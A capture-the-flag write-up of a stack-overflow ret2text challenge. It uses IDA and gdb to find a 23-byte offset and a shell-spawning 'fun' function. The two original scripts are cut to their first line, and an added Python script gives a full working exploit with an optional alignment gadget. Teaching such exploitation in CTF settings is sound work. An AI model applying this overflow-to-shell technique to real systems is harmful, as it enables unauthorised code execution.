Challenge information
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102301.jpg)
64-bit ELF, a single simple input, almost no mitigations enabled.
Static analysis
In IDA the overflow is obvious, and the binary ships a ready-made fun function that spawns a shell, so it is enough to control rip and return into fun.
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102302.jpg)
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102303.jpg)
Dynamic analysis
A quick look in gdb: the offset from the start of the buffer to the saved return address is 23 bytes, and fun is at 0x401186.
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102304.jpg)
exploit
```python
from pwn import *
```
Another approach, building the ROP chain by hand:
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102305.jpg)
![](https://raw.githubusercontent.com/zjicmDarkWing/images/master/2019102306.jpg)
```python
from pwn import *
```
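Both scripts above survive only as their first line, so here is an added example (my own code, not the writeup's script) that builds the same payload without pwntools, from the two facts the analysis established: 23 bytes of padding before the saved rip and fun at 0x401186. The binary path `./pwn`, delivery over stdin, and the optional ret-gadget address are assumptions. The gadget slot covers the hand-built chain variant: on glibc from Ubuntu 18.04 onward, returning straight into fun can leave rsp misaligned when its body calls system(), which then faults on a movaps; one extra `ret` before the target fixes that.

```python
"""
Added example, not the original writeup's exploit.
Builds and delivers the ret2text payload for the challenge discussed above.
Known from the writeup: padding 23 bytes, fun at 0x401186.
Assumed (hypothetical): binary path ./pwn, input read from stdin,
and the address of any `ret` gadget passed via ret_gadget.
"""
import struct
import subprocess
import sys

OFFSET = 23          # bytes from buffer start to saved rip (gdb above)
FUN_ADDR = 0x401186  # address of fun (IDA/gdb above)


def p64(value):
    """Little-endian 64-bit pack, equivalent to pwntools' p64 on amd64."""
    return struct.pack("<Q", value)


def build_payload(offset=OFFSET, target=FUN_ADDR, ret_gadget=None):
    """
    Layout: padding | [ret gadget] | target

    The ret gadget is optional. It pops one extra qword so rsp is
    16-byte aligned when fun's body calls system(); without it system()
    can crash on a movaps on modern glibc. The writeup returns directly
    into fun, so the default chain carries no gadget.
    """
    chain = b"A" * offset
    if ret_gadget is not None:
        chain += p64(ret_gadget)
    chain += p64(target)
    return chain


def check_payload(payload):
    """
    Reject payloads a gets()/fgets()-style read would cut short.
    A 0x0a byte anywhere in the chain terminates the line early; NUL
    bytes in the high half of an address are fine for a raw read.
    """
    return b"\n" not in payload


def run_exploit(binary, payload):
    """Send the payload on stdin, then keep the spawned shell interactive."""
    proc = subprocess.Popen([binary], stdin=subprocess.PIPE)
    proc.stdin.write(payload + b"\n")
    proc.stdin.flush()
    try:
        # Forward our own stdin line by line until EOF so the shell
        # started by fun() does not immediately see end of input.
        for line in sys.stdin.buffer:
            proc.stdin.write(line)
            proc.stdin.flush()
    except BrokenPipeError:
        pass
    proc.stdin.close()
    return proc.wait()


if __name__ == "__main__":
    # usage: python3 exp.py [./pwn] [0xRET_GADGET]
    target_binary = sys.argv[1] if len(sys.argv) > 1 else "./pwn"  # assumed path
    gadget = int(sys.argv[2], 16) if len(sys.argv) > 2 else None
    pl = build_payload(ret_gadget=gadget)
    if not check_payload(pl):
        sys.exit("payload contains a newline; pick another gadget address")
    sys.exit(run_exploit(target_binary, pl))
```

Run it as `python3 exp.py ./pwn` to reproduce the writeup's direct jump, or `python3 exp.py ./pwn 0x<ret gadget>` (find one with `ROPgadget --binary ./pwn --only ret`) if the shell dies with SIGSEGV inside system().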